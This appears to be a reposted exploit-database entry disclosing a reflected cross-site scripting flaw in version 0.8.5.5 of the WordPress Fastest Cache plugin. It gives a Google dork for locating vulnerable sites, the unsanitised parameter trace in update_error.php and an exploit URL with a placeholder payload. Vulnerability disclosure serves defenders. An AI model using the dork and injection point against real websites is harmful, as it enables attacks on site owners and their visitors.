WordPress Fastest Cache plugin XSS Vulnerability

Posted on Posted in Exploit
Full title WordPress Fastest Cache plugin XSS Vulnerability
Date add 01-12-2015
Category web applications
Platform php
Risk
Security Risk Medium
######################################################################
# Exploit Title: WordPress plugin wp-fastest-cache  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
#Version:0.8.5.5
# Google dork: inurl:/wp-content/plugins/wp-fastest-cache
######################################################################
  
 The code in ./wp-fastest-cache/templates/update_error.php
  
 
        34: echo echo $error_message; 
        8: $error_message = strip_tags($error_message); 
            7: $error_message = str_replace(array("\"", "'"), "", $error_message); 
                6: $error_message = $_GET['error_message']; 
 
  
  
Exploit
http://server/wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=/*XSS_HERE*/

Quelle: 0day.today

Facebooktwittergoogle_plus